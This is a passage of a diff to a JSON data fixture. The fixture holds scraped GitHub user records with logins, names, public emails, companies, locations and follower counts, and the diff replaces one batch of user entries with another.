"2024-09-02T20:03:02Z", + "node_id": "MDQ6VXNlcjYwMDA2NTQ=", + "bio": "Head of SRE @opendatasoft", "is_hireable": false, - "twitter_username": "" + "twitter_username": "jleproust" } }, { "model": "github.user", - "pk": 965, + "pk": 6216, "fields": { - "nest_created_at": "2024-09-11T22:37:49.372Z", - "nest_updated_at": "2024-09-18T19:10:24.371Z", - "name": "Max Leske", - "login": "theseion", + "nest_created_at": "2024-09-22T07:36:45.202Z", + "nest_updated_at": "2024-09-22T18:39:16.468Z", + "name": "Hugh McMaster", + "login": "hughmcmaster", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/250711?v=4", - "company": "Xovis.com", + "avatar_url": "https://avatars.githubusercontent.com/u/11186136?v=4", + "company": "", "location": "", "collaborators_count": 0, - "following_count": 10, - "followers_count": 37, + "following_count": 0, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 72, - "created_at": "2010-04-23T12:24:31Z", - "updated_at": "2024-08-20T13:41:02Z", - "node_id": "MDQ6VXNlcjI1MDcxMQ==", + "public_repositories_count": 35, + "created_at": "2015-02-25T02:11:11Z", + "updated_at": "2024-08-18T23:38:42Z", + "node_id": "MDQ6VXNlcjExMTg2MTM2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -384378,24 +641327,24 @@ }, { "model": "github.user", - "pk": 966, + "pk": 6217, "fields": { - "nest_created_at": "2024-09-11T22:37:53.232Z", - "nest_updated_at": "2024-09-11T22:39:24.721Z", - "name": "WGH", - "login": "WGH-", + "nest_created_at": "2024-09-22T07:36:45.831Z", + "nest_updated_at": "2024-09-22T18:39:17.104Z", + "name": "Mauro Faccenda", + "login": "maurofaccenda", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1099351?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/7914385?v=4", "company": "", - "location": "", + "location": "Krakow, PL", "collaborators_count": 0, "following_count": 1, - "followers_count": 29, - "public_gists_count": 16, - "public_repositories_count": 107, - "created_at": "2011-10-03T16:36:38Z", - "updated_at": "2024-05-01T14:41:58Z", - "node_id": "MDQ6VXNlcjEwOTkzNTE=", + "followers_count": 8, + "public_gists_count": 10, + "public_repositories_count": 2, + "created_at": "2014-06-17T15:22:12Z", + "updated_at": "2024-09-21T11:42:05Z", + "node_id": "MDQ6VXNlcjc5MTQzODU=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -384403,24 +641352,24 @@ }, { "model": "github.user", - "pk": 967, + "pk": 6218, "fields": { - "nest_created_at": "2024-09-11T22:37:57.715Z", - "nest_updated_at": "2024-09-11T22:37:57.715Z", - "name": "", - "login": "jimant", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/20418597?v=4", + "nest_created_at": "2024-09-22T07:36:46.138Z", + "nest_updated_at": "2024-09-22T18:39:17.410Z", + "name": "Michael Simpson", + "login": "metalspawn", + "email": "mikessimpson@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/466932?v=4", "company": "", - "location": "", + "location": "Sydney, Australia", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2016-07-12T11:15:16Z", - "updated_at": "2021-10-13T08:47:31Z", - "node_id": "MDQ6VXNlcjIwNDE4NTk3", + "public_repositories_count": 14, + "created_at": "2010-11-04T06:24:36Z", + "updated_at": "2024-08-15T03:39:10Z", + "node_id": "MDQ6VXNlcjQ2NjkzMg==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -384428,74 +641377,74 @@ }, { "model": "github.user", - "pk": 968, + "pk": 6219, "fields": { - "nest_created_at": "2024-09-11T22:37:59.770Z", - "nest_updated_at": "2024-09-11T22:37:59.770Z", - "name": "oelnaggar", - "login": "ossie-git", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/25382296?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T07:36:46.766Z", + "nest_updated_at": "2024-09-22T18:39:18.041Z", + "name": "Neil Craig", + "login": "neilstuartcraig", + "email": "neil.craig@thedotproduct.org", + "avatar_url": "https://avatars.githubusercontent.com/u/320215?v=4", + "company": "BBC", + "location": "Oxfordshire, UK", "collaborators_count": 0, - "following_count": 5, - "followers_count": 9, - "public_gists_count": 8, - "public_repositories_count": 33, - "created_at": "2017-01-27T08:02:34Z", - "updated_at": "2024-09-10T13:00:46Z", - "node_id": "MDQ6VXNlcjI1MzgyMjk2", - "bio": "", + "following_count": 0, + "followers_count": 35, + "public_gists_count": 42, + "public_repositories_count": 19, + "created_at": "2010-07-01T15:41:15Z", + "updated_at": "2024-07-03T20:50:54Z", + "node_id": "MDQ6VXNlcjMyMDIxNQ==", + "bio": "Lead Architect @BBC\r\nThis is my personal GitHub profile", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 969, + "pk": 6220, "fields": { - "nest_created_at": "2024-09-11T22:38:02.213Z", - "nest_updated_at": "2024-09-11T22:38:02.213Z", - "name": "Gustavo Sampaio", - "login": "GustavoKatel", - "email": "github@gsampaio.dev", - "avatar_url": "https://avatars.githubusercontent.com/u/1891977?v=4", - "company": "@toggl", - "location": "João Pessoa, Brazil", + "nest_created_at": "2024-09-22T07:36:47.405Z", + "nest_updated_at": "2024-09-22T18:39:18.669Z", + "name": "Rajesh Rajendran", + "login": "rjshrjndrn", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2563385?v=4", + "company": "OpenReplay", + "location": "Paris, France", "collaborators_count": 0, - "following_count": 65, - "followers_count": 88, - "public_gists_count": 7, - "public_repositories_count": 123, - "created_at": "2012-06-26T00:07:12Z", - "updated_at": "2024-09-11T17:11:14Z", - "node_id": "MDQ6VXNlcjE4OTE5Nzc=", - "bio": "", + "following_count": 4, + "followers_count": 30, + "public_gists_count": 3, + "public_repositories_count": 172, + "created_at": "2012-10-15T10:50:16Z", + "updated_at": "2024-09-12T02:44:52Z", + "node_id": "MDQ6VXNlcjI1NjMzODU=", + "bio": "@openreplay ", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 970, + "pk": 6221, "fields": { - "nest_created_at": "2024-09-11T22:38:04.349Z", - "nest_updated_at": "2024-09-11T22:38:04.349Z", + "nest_created_at": "2024-09-22T07:36:47.723Z", + "nest_updated_at": "2024-09-22T18:39:18.978Z", "name": "", - "login": "jdornan", + "login": "0xBin", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/50336903?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/92743225?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2019-05-06T17:36:03Z", - "updated_at": "2019-05-06T17:36:57Z", - "node_id": "MDQ6VXNlcjUwMzM2OTAz", + "public_repositories_count": 0, + "created_at": "2021-10-18T15:49:12Z", + "updated_at": "2021-10-18T15:50:19Z", + "node_id": "U_kgDOBYcmOQ", "bio": "", "is_hireable": false, "twitter_username": "" @@ -384503,99 +641452,99 @@ }, { "model": "github.user", - "pk": 971, + "pk": 6222, "fields": { - "nest_created_at": "2024-09-11T22:38:06.886Z", - "nest_updated_at": "2024-09-12T02:27:07.538Z", - "name": "", - "login": "rainerjung", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/701263?v=4", + "nest_created_at": "2024-09-22T07:36:48.393Z", + "nest_updated_at": "2024-09-22T19:48:38.747Z", + "name": "Takaya Saeki", + "login": "nullpo-head", + "email": "abc.tkys+pub@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2311662?v=4", "company": "", - "location": "", + "location": "Tokyo, Japan (UTC+0900)", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 1, - "public_repositories_count": 18, - "created_at": "2011-03-31T10:01:59Z", - "updated_at": "2021-07-29T11:33:50Z", - "node_id": "MDQ6VXNlcjcwMTI2Mw==", - "bio": "", - "is_hireable": false, + "following_count": 53, + "followers_count": 240, + "public_gists_count": 2, + "public_repositories_count": 56, + "created_at": "2012-09-09T15:03:32Z", + "updated_at": "2024-09-21T00:47:55Z", + "node_id": "MDQ6VXNlcjIzMTE2NjI=", + "bio": "(☕, 🍣, 🍔) => 💻", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 972, + "pk": 6223, "fields": { - "nest_created_at": "2024-09-11T22:38:09.785Z", - "nest_updated_at": "2024-09-11T22:38:09.785Z", - "name": "", - "login": "markblackman", + "nest_created_at": "2024-09-22T07:36:48.705Z", + "nest_updated_at": "2024-09-22T19:48:26.307Z", + "name": "Tim Herren", + "login": "nerrehmit", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/16478758?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/15264624?v=4", + "company": "Puzzle ITC GmbH", + "location": "Switzerland", "collaborators_count": 0, - "following_count": 6, - "followers_count": 5, - "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2015-12-29T16:27:09Z", - "updated_at": "2024-08-30T14:35:23Z", - "node_id": "MDQ6VXNlcjE2NDc4NzU4", - "bio": "", + "following_count": 9, + "followers_count": 11, + "public_gists_count": 1, + "public_repositories_count": 26, + "created_at": "2015-10-23T13:18:21Z", + "updated_at": "2024-08-05T20:03:35Z", + "node_id": "MDQ6VXNlcjE1MjY0NjI0", + "bio": "working with and on computers @puzzle ", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 973, + "pk": 6224, "fields": { - "nest_created_at": "2024-09-11T22:38:12.269Z", - "nest_updated_at": "2024-09-11T22:38:12.269Z", - "name": "Federico G. Schwindt", - "login": "fgsch", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/241785?v=4", + "nest_created_at": "2024-09-22T07:36:49.322Z", + "nest_updated_at": "2024-09-22T18:39:20.603Z", + "name": "Torben Hansen", + "login": "derhansen", + "email": "derhansen@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2629896?v=4", "company": "", - "location": "Cambridgeshire, UK", + "location": "Husum, Germany", "collaborators_count": 0, - "following_count": 38, - "followers_count": 90, - "public_gists_count": 3, - "public_repositories_count": 45, - "created_at": "2010-04-11T22:10:45Z", - "updated_at": "2024-09-03T11:21:04Z", - "node_id": "MDQ6VXNlcjI0MTc4NQ==", - "bio": "Code makes me happy.", + "following_count": 34, + "followers_count": 78, + "public_gists_count": 40, + "public_repositories_count": 108, + "created_at": "2012-10-23T08:17:14Z", + "updated_at": "2024-06-19T06:49:46Z", + "node_id": "MDQ6VXNlcjI2Mjk4OTY=", + "bio": "Freelance Web Developer, mainly focused on TYPO3, PHP and Python development, TYPO3 Security Team Co-Lead\r\n", "is_hireable": false, - "twitter_username": "" + "twitter_username": "derhansen" } }, { "model": "github.user", - "pk": 974, + "pk": 6225, "fields": { - "nest_created_at": "2024-09-11T22:38:13.460Z", - "nest_updated_at": "2024-09-11T22:38:13.460Z", - "name": "Anat (Fox) Davidi", - "login": "afoxdavidi", + "nest_created_at": "2024-09-22T07:36:49.643Z", + "nest_updated_at": "2024-09-22T18:39:20.924Z", + "name": "Cheng HUANG", + "login": "ahuango", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/51437167?v=4", - "company": "Trustwave @SpiderLabs", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6158182?v=4", + "company": "Technology Development Dept., Shanghai Stock Exchange", + "location": "Shanghai, China", "collaborators_count": 0, "following_count": 0, - "followers_count": 6, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2019-06-06T07:35:16Z", - "updated_at": "2024-08-24T11:31:59Z", - "node_id": "MDQ6VXNlcjUxNDM3MTY3", + "public_repositories_count": 23, + "created_at": "2013-12-11T05:38:05Z", + "updated_at": "2021-08-02T00:21:34Z", + "node_id": "MDQ6VXNlcjYxNTgxODI=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -384603,74 +641552,74 @@ }, { "model": "github.user", - "pk": 975, + "pk": 6226, "fields": { - "nest_created_at": "2024-09-11T22:38:15.108Z", - "nest_updated_at": "2024-09-11T22:38:15.108Z", - "name": "Mirko Dziadzka", - "login": "mirkodziadzka-avi", - "email": "mdziadzka@vmware.com", - "avatar_url": "https://avatars.githubusercontent.com/u/29118782?v=4", - "company": "@avinetworks - now part of @vmware", - "location": "Regensburg, Germany", + "nest_created_at": "2024-09-22T07:36:49.946Z", + "nest_updated_at": "2024-09-22T18:39:21.233Z", + "name": "ajrpayne", + "login": "ajrpayne", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6218298?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 8, - "followers_count": 5, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2017-06-01T09:17:34Z", - "updated_at": "2024-08-21T14:37:21Z", - "node_id": "MDQ6VXNlcjI5MTE4Nzgy", - "bio": "Developer at @avinetworks - now part of @vmware.\r\n\r\nApp Security and Web Application Firewall (WAF).\r\n\r\nFor my personal account, see @MirkoDziadzka", + "public_repositories_count": 10, + "created_at": "2013-12-18T22:04:11Z", + "updated_at": "2024-06-03T20:01:57Z", + "node_id": "MDQ6VXNlcjYyMTgyOTg=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 976, + "pk": 6227, "fields": { - "nest_created_at": "2024-09-11T22:38:16.754Z", - "nest_updated_at": "2024-09-18T19:10:24.694Z", - "name": "Ervin Hegedus", - "login": "airween", - "email": "airween@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/238977?v=4", - "company": "Digitalwave Ltd.", - "location": "Hungary", + "nest_created_at": "2024-09-22T07:36:50.255Z", + "nest_updated_at": "2024-09-22T18:39:21.557Z", + "name": "Chuck Wolber", + "login": "chuckwolber", + "email": "chuckwolber@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/8021037?v=4", + "company": "", + "location": "Seattle, Washington", "collaborators_count": 0, - "following_count": 15, - "followers_count": 22, - "public_gists_count": 25, - "public_repositories_count": 30, - "created_at": "2010-04-07T19:21:44Z", - "updated_at": "2024-09-03T05:40:07Z", - "node_id": "MDQ6VXNlcjIzODk3Nw==", - "bio": "Whitespace makes me happy.", + "following_count": 22, + "followers_count": 8, + "public_gists_count": 2, + "public_repositories_count": 25, + "created_at": "2014-06-29T22:45:30Z", + "updated_at": "2024-09-17T14:49:31Z", + "node_id": "MDQ6VXNlcjgwMjEwMzc=", + "bio": "math.science.stuff();\r\n", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 977, + "pk": 6228, "fields": { - "nest_created_at": "2024-09-11T22:38:17.532Z", - "nest_updated_at": "2024-09-11T22:41:56.562Z", + "nest_created_at": "2024-09-22T07:36:50.577Z", + "nest_updated_at": "2024-09-22T18:39:21.872Z", "name": "", - "login": "martinhsv", + "login": "dkamen", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/55407942?v=4", - "company": "Trustwave Spiderlabs", - "location": "Canada", + "avatar_url": "https://avatars.githubusercontent.com/u/6302563?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 3, - "followers_count": 75, - "public_gists_count": 1, - "public_repositories_count": 4, - "created_at": "2019-09-16T18:02:09Z", - "updated_at": "2024-01-25T19:23:51Z", - "node_id": "MDQ6VXNlcjU1NDA3OTQy", + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2014-01-02T10:56:53Z", + "updated_at": "2023-11-09T22:44:43Z", + "node_id": "MDQ6VXNlcjYzMDI1NjM=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -384678,49 +641627,49 @@ }, { "model": "github.user", - "pk": 978, + "pk": 6229, "fields": { - "nest_created_at": "2024-09-11T22:38:18.867Z", - "nest_updated_at": "2024-09-11T22:38:18.867Z", - "name": "khushbu", - "login": "khushbuparakh", - "email": "khushbuparakh@hotmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/7480669?v=4", - "company": "founder of @sos, mentor @systers, intern @avinetworks ", - "location": "Dallas, Texas", + "nest_created_at": "2024-09-22T07:36:50.888Z", + "nest_updated_at": "2024-09-22T18:39:22.189Z", + "name": "jxm", + "login": "nowaits", + "email": "jiangxiaoming@outlook.com", + "avatar_url": "https://avatars.githubusercontent.com/u/4214452?v=4", + "company": "", + "location": "China", "collaborators_count": 0, - "following_count": 71, - "followers_count": 50, - "public_gists_count": 2, - "public_repositories_count": 41, - "created_at": "2014-05-04T14:15:30Z", - "updated_at": "2024-02-27T21:18:07Z", - "node_id": "MDQ6VXNlcjc0ODA2Njk=", - "bio": "Studying Computer Science at SMU Dallas. Specialization in Cybersecurity, FOSS passionate.", + "following_count": 6, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 66, + "created_at": "2013-04-21T06:00:42Z", + "updated_at": "2024-05-25T00:18:48Z", + "node_id": "MDQ6VXNlcjQyMTQ0NTI=", + "bio": "", "is_hireable": true, - "twitter_username": "cokencode" + "twitter_username": "" } }, { "model": "github.user", - "pk": 979, + "pk": 6230, "fields": { - "nest_created_at": "2024-09-11T22:38:23.046Z", - "nest_updated_at": "2024-09-11T22:38:23.046Z", - "name": "Matthias Hörmann", - "login": "taladar", + "nest_created_at": "2024-09-22T07:36:51.195Z", + "nest_updated_at": "2024-09-22T18:39:22.507Z", + "name": "Kadir ERDOGAN", + "login": "kadirerdogan", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/21060?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/12003295?v=4", "company": "", - "location": "Germany", + "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 8, - "public_gists_count": 3, - "public_repositories_count": 56, - "created_at": "2008-08-18T19:00:54Z", - "updated_at": "2023-10-17T20:35:30Z", - "node_id": "MDQ6VXNlcjIxMDYw", + "following_count": 2, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2015-04-18T04:32:34Z", + "updated_at": "2023-03-17T12:02:56Z", + "node_id": "MDQ6VXNlcjEyMDAzMjk1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -384728,24 +641677,24 @@ }, { "model": "github.user", - "pk": 980, + "pk": 6231, "fields": { - "nest_created_at": "2024-09-11T22:38:24.803Z", - "nest_updated_at": "2024-09-11T22:38:24.803Z", + "nest_created_at": "2024-09-22T07:36:51.503Z", + "nest_updated_at": "2024-09-22T19:48:43.604Z", "name": "", - "login": "arjunvrm", + "login": "supplient", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/38151635?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/22533904?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2018-04-07T06:25:33Z", - "updated_at": "2019-10-25T09:00:58Z", - "node_id": "MDQ6VXNlcjM4MTUxNjM1", + "following_count": 6, + "followers_count": 6, + "public_gists_count": 12, + "public_repositories_count": 61, + "created_at": "2016-09-30T01:02:09Z", + "updated_at": "2024-09-11T00:58:06Z", + "node_id": "MDQ6VXNlcjIyNTMzOTA0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -384753,24 +641702,24 @@ }, { "model": "github.user", - "pk": 981, + "pk": 6232, "fields": { - "nest_created_at": "2024-09-11T22:38:26.415Z", - "nest_updated_at": "2024-09-11T22:38:26.415Z", - "name": "", - "login": "jwillberg", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/20167537?v=4", - "company": "", + "nest_created_at": "2024-09-22T07:36:51.825Z", + "nest_updated_at": "2024-09-22T18:39:23.128Z", + "name": "StarryNight", + "login": "StarryVae", + "email": "starryvae@qq.com", + "avatar_url": "https://avatars.githubusercontent.com/u/23182024?v=4", + "company": "NetEase", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 4, + "followers_count": 16, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2016-06-27T12:51:51Z", - "updated_at": "2024-02-28T09:43:52Z", - "node_id": "MDQ6VXNlcjIwMTY3NTM3", + "public_repositories_count": 38, + "created_at": "2016-11-01T03:05:17Z", + "updated_at": "2024-07-27T12:17:52Z", + "node_id": "MDQ6VXNlcjIzMTgyMDI0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -384778,24 +641727,49 @@ }, { "model": "github.user", - "pk": 982, + "pk": 6233, "fields": { - "nest_created_at": "2024-09-11T22:38:28.153Z", - "nest_updated_at": "2024-09-11T22:38:28.153Z", - "name": "Daniel Townend", - "login": "dto20", + "nest_created_at": "2024-09-22T07:36:52.140Z", + "nest_updated_at": "2024-09-22T18:39:23.433Z", + "name": "Aleks", + "login": "git001", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/44569992?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1579468?v=4", + "company": "ME2Digital", + "location": "Vienna, Austria, Europe", + "collaborators_count": 0, + "following_count": 10, + "followers_count": 14, + "public_gists_count": 14, + "public_repositories_count": 111, + "created_at": "2012-03-27T11:22:24Z", + "updated_at": "2024-04-10T15:16:27Z", + "node_id": "MDQ6VXNlcjE1Nzk0Njg=", + "bio": "I'm a explorer, developer and architect in the IT", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 6234, + "fields": { + "nest_created_at": "2024-09-22T07:36:52.459Z", + "nest_updated_at": "2024-09-22T18:39:23.775Z", + "name": "phantom-az", + "login": "phantom-az", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/19828218?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2018-10-29T09:54:00Z", - "updated_at": "2021-12-07T11:49:22Z", - "node_id": "MDQ6VXNlcjQ0NTY5OTky", + "public_repositories_count": 2, + "created_at": "2016-06-08T23:22:30Z", + "updated_at": "2016-06-16T10:17:13Z", + "node_id": "MDQ6VXNlcjE5ODI4MjE4", "bio": "", "is_hireable": false, "twitter_username": "" @@ -384803,74 +641777,74 @@ }, { "model": "github.user", - "pk": 983, + "pk": 6235, "fields": { - "nest_created_at": "2024-09-11T22:38:31.035Z", - "nest_updated_at": "2024-09-11T22:38:31.035Z", - "name": "Nikita Mashnyaga", - "login": "slinikma", + "nest_created_at": "2024-09-22T07:36:52.774Z", + "nest_updated_at": "2024-09-22T18:39:24.093Z", + "name": "Othman Madjoudj (aka Athmane)", + "login": "omadjoudj", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/23367943?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/143351?v=4", + "company": "@Mirantis", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2016-11-09T22:19:28Z", - "updated_at": "2024-06-02T18:52:48Z", - "node_id": "MDQ6VXNlcjIzMzY3OTQz", + "following_count": 0, + "followers_count": 20, + "public_gists_count": 29, + "public_repositories_count": 58, + "created_at": "2009-10-22T20:13:41Z", + "updated_at": "2024-05-24T15:54:15Z", + "node_id": "MDQ6VXNlcjE0MzM1MQ==", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 984, + "pk": 6236, "fields": { - "nest_created_at": "2024-09-11T22:38:32.712Z", - "nest_updated_at": "2024-09-11T22:38:32.712Z", - "name": "", - "login": "jeremyjpj0916", + "nest_created_at": "2024-09-22T07:36:53.094Z", + "nest_updated_at": "2024-09-22T18:39:24.411Z", + "name": "Behzad Eslami Tehrani", + "login": "bitbehz", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/31913027?v=4", - "company": "Optum", - "location": "South Carolina", + "avatar_url": "https://avatars.githubusercontent.com/u/7345919?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 5, - "followers_count": 13, + "following_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 44, - "created_at": "2017-09-13T05:04:38Z", - "updated_at": "2024-08-12T00:32:52Z", - "node_id": "MDQ6VXNlcjMxOTEzMDI3", - "bio": "Always enjoy tinkering in some code. ", + "public_repositories_count": 6, + "created_at": "2014-04-19T11:03:36Z", + "updated_at": "2024-08-22T19:00:04Z", + "node_id": "MDQ6VXNlcjczNDU5MTk=", + "bio": "", "is_hireable": false, - "twitter_username": "jeremyj0916" + "twitter_username": "" } }, { "model": "github.user", - "pk": 985, + "pk": 6237, "fields": { - "nest_created_at": "2024-09-11T22:38:36.478Z", - "nest_updated_at": "2024-09-11T22:38:36.478Z", - "name": "", - "login": "Steve8291", + "nest_created_at": "2024-09-22T07:36:53.404Z", + "nest_updated_at": "2024-09-22T18:39:24.718Z", + "name": "Brandon Myers", + "login": "pwnbus", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/17433692?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/2117578?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 17, - "created_at": "2016-02-23T15:48:05Z", - "updated_at": "2024-07-30T17:38:37Z", - "node_id": "MDQ6VXNlcjE3NDMzNjky", + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 4, + "created_at": "2012-08-08T15:28:20Z", + "updated_at": "2024-09-06T15:27:23Z", + "node_id": "MDQ6VXNlcjIxMTc1Nzg=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -384878,24 +641852,24 @@ }, { "model": "github.user", - "pk": 986, + "pk": 6238, "fields": { - "nest_created_at": "2024-09-11T22:38:38.115Z", - "nest_updated_at": "2024-09-11T22:38:38.115Z", + "nest_created_at": "2024-09-22T07:36:53.800Z", + "nest_updated_at": "2024-09-22T18:39:25.036Z", "name": "", - "login": "mmelo-yottaa", + "login": "bnordgren", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/47983969?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/976922?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 1, - "public_repositories_count": 3, - "created_at": "2019-02-25T15:45:36Z", - "updated_at": "2024-09-03T12:04:14Z", - "node_id": "MDQ6VXNlcjQ3OTgzOTY5", + "following_count": 1, + "followers_count": 3, + "public_gists_count": 7, + "public_repositories_count": 24, + "created_at": "2011-08-12T21:36:02Z", + "updated_at": "2024-08-26T18:51:12Z", + "node_id": "MDQ6VXNlcjk3NjkyMg==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -384903,49 +641877,49 @@ }, { "model": "github.user", - "pk": 987, + "pk": 6239, "fields": { - "nest_created_at": "2024-09-11T22:38:39.721Z", - "nest_updated_at": "2024-09-11T22:38:39.721Z", - "name": "Rafael Lima Joia", - "login": "rljoia", - "email": "rljoia@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/6485356?v=4", - "company": "xGeeks", - "location": "Porto, Portugal", + "nest_created_at": "2024-09-22T07:36:54.155Z", + "nest_updated_at": "2024-09-22T18:39:25.343Z", + "name": "Chase Venters", + "login": "cventers", + "email": "me@chaseventers.com", + "avatar_url": "https://avatars.githubusercontent.com/u/391669?v=4", + "company": "Exceleron Software LLC", + "location": "Dallas, TX", "collaborators_count": 0, - "following_count": 6, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2014-01-23T20:20:57Z", - "updated_at": "2023-12-29T11:23:06Z", - "node_id": "MDQ6VXNlcjY0ODUzNTY=", - "bio": "Software Engineer", + "following_count": 2, + "followers_count": 15, + "public_gists_count": 1, + "public_repositories_count": 20, + "created_at": "2010-09-08T08:11:30Z", + "updated_at": "2024-09-05T21:33:17Z", + "node_id": "MDQ6VXNlcjM5MTY2OQ==", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 988, + "pk": 6240, "fields": { - "nest_created_at": "2024-09-11T22:38:41.792Z", - "nest_updated_at": "2024-09-11T22:38:41.792Z", - "name": "", - "login": "jatgh", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1170520?v=4", + "nest_created_at": "2024-09-22T07:36:54.473Z", + "nest_updated_at": "2024-09-22T18:39:25.661Z", + "name": "Daniel J. Luke", + "login": "danielluke", + "email": "dluke@geeklair.net", + "avatar_url": "https://avatars.githubusercontent.com/u/9056636?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 10, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2011-11-03T18:34:26Z", - "updated_at": "2024-05-07T19:53:27Z", - "node_id": "MDQ6VXNlcjExNzA1MjA=", + "public_repositories_count": 2, + "created_at": "2014-10-07T18:47:31Z", + "updated_at": "2024-05-28T00:09:14Z", + "node_id": "MDQ6VXNlcjkwNTY2MzY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -384953,49 +641927,49 @@ }, { "model": "github.user", - "pk": 989, + "pk": 6241, "fields": { - "nest_created_at": "2024-09-11T22:38:44.299Z", - "nest_updated_at": "2024-09-11T22:38:44.299Z", - "name": "Paul Charlton", - "login": "PaulCharlton", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1747363?v=4", - "company": "Results ByIQ LLC", - "location": "Maui", + "nest_created_at": "2024-09-22T07:36:54.778Z", + "nest_updated_at": "2024-09-22T18:39:25.971Z", + "name": "Danila Vershinin", + "login": "dvershinin", + "email": "info@getpagespeed.com", + "avatar_url": "https://avatars.githubusercontent.com/u/250071?v=4", + "company": "@cloudlinux", + "location": "🇮🇩 Samarinda", "collaborators_count": 0, - "following_count": 7, - "followers_count": 7, - "public_gists_count": 1, - 